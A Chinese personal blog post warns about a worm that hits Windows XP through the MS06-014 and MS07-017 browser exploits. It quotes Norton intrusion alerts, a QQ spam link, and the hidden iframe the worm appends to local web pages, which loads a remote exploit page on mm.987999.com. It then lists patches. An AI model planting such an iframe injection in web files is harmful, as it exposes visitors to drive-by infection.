Aug 1

蠕虫病毒www.987999.com 晴

Steven , 01:01 , 记录 , 评论(0) , 引用(0) , 阅读(2781) , Via 本站原创 | |
日志之前先看看几段诺顿的拦截报告:
引用

详细说明: 检测到并禁止了针对您计算机的入侵企图“HTTP MSIE Generic Browser Exploit”。
入侵者: w*w.987999.com(60.190.217.136)(http(80))。
风险级别: 高级。
协议: TCP。
攻击的 IP: COCO(192.168.1.104)。
攻击的端口: 2629。


引用

详细说明: 检测到并禁止了入侵。与 w*w.987999.com(60.190.217.136) 的所有通信将禁止 30 分钟。  
单击该地址可跟踪攻击者。  
 

最近电脑经常遭受到这个蠕虫病毒的侵扰,最讨厌的是它会把你电脑里所有的网页文件被加上h**p://mm.987999.com网址,常见的方法是在网页文件的代码最下部自动加上

引用
< iframe src=h**p://m m.987999.com/mm/a.htm width=100 height=0>< /iframe>


如果要清除可能要把你累到死,即使使用网页批量编辑器也只能一个文件夹一个文件夹的删除这代码,如果遇到在电脑里存放海量网页文件的话,那真的不想活了。

这个病毒还会入侵其他的程序,比如QQ,当你在使用QQ和人家临时会话会出来h**p://mm.987999.com/mm/ok.htm 类似这样子的网址,如果你不小心点到的话,那就惨了。

w*w.987999.com(60.190.217.136)这个网站的IP是浙江省绍兴市电信IDC机房里的,但这可能是个伪装的IP地址,而且它的主页并不能访问,只有自动连接的网页里会分别调用其他的木马文件。

查了一下资料,这个病毒是Ms06-014和Ms07-017网页木马,需要给你的Windows XP系统打上相应的补丁,就可以避免。

补丁地址:

MS06-014
http://www.microsoft.com/downloads/details.aspx?FamilyID=2f9e772c-8122-4027-a117...

MS07-017
http://www.microsoft.com/downloads/details.aspx?FamilyID=f82ea184-945f-4b78-9463...

记住哦,以后上网要小心,网络陷阱随处可见,最好使用比较安全的浏览器,例如Firefox 2.0,这个浏览器可以安全有效的保护您的电脑不受网页病毒入侵。

Firefox 2.0浏览器下载网址http://www.couke.com/Firefox
Tags: , , , , ,
发表评论

昵称

网址

电邮

打开HTML 打开UBB 打开表情 隐藏 记住我 [登入] [注册]